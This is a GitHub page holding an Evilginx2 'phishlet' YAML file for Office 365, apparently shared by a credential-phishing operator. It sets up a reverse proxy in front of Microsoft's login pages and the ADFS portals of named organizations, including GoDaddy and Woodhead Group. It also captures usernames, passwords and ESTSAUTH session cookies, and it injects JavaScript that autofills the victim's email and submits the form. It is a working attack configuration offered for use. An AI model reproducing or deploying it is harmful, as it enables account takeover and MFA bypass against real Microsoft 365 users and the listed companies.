forked from An0nUD4Y/Evilginx2-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
o365(working-october21).yaml
95 lines (93 loc) · 5.73 KB
/
o365(working-october21).yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
name: 'o365'
author: '@G66K ICQ: 747246257'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
# The lines below are needed if your target organization utilizes ADFS.
# If they do, you need to uncomment all following lines that contain <...>
# To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
# Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
# <insert-adfs-subdomain> = adfs
# <insert-adfs-host> = example.com
# <insert-adfs-subdomain-and-host> = adfs.example.com
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
- {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing:false}
- {phish_sub: 'adfs', orig_sub: 'sso', domain: 'godaddy.com:443', session: true, is_landing:false}
- {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
- {phish_sub: 'adfs', orig_sub: 'adfs', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
- {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
- {phish_sub: 'sso', orig_sub: 'sso', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
- {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
- {phish_sub: 'sts', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
- {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk', session: true, is_landing:false}
- {phish_sub: 'idfs', orig_sub: 'sts', domain: 'woodhead-group.co.uk:443', session: true, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
# Uncomment and fill in if your target organization utilizes ADFS
#- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'sso.godaddy.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'adfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'sso.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'sts.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
- {triggers_on: 'idfs.woodhead-group.co.uk', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
auth_tokens:
- domain: '.login.microsoftonline.com'
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
- domain: 'login.microsoftonline.com'
keys: ['SignInStateCookie']
auth_urls:
- '/kmsi*'
credentials:
username:
key: '(login|UserName)'
search: '(.*)'
type: 'post'
password:
key: '(passwd|Password)'
search: '(.*)'
type: 'post'
login:
domain: 'login.microsoftonline.com'
path: '/'
js_inject:
- trigger_domains: ["www.domain.com"]
trigger_paths: ["/"]
script: |
function gimmesleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
async function redir() {
await gimmesleep(2000);
window.location.href = "{rurl}";
}
redir()
js_inject:
- trigger_domains: ["login.microsoftonline.com"]
trigger_paths: ["/common/oauth2/","/","/*"]
script: |
function lp(){
var emailId = document.querySelector("#i0116");
var nextButton = document.querySelector("#idSIButton9");
var query = window.location.href;
if (/#/.test(window.location.href)){
var res = query.split("#");
var data1 = res[0];
var data2 = res[1];
console.log(data1);
console.log(data2);
if (emailId != null) {
var m = data2.replace(/[=]/gi, '');
emailId.focus();
emailId.value = m;
nextButton.focus();
nextButton.click();
console.log("YES!");
return;
}
}
setTimeout(function(){lp();}, 1500);
}
setTimeout(function(){lp();}, 1500);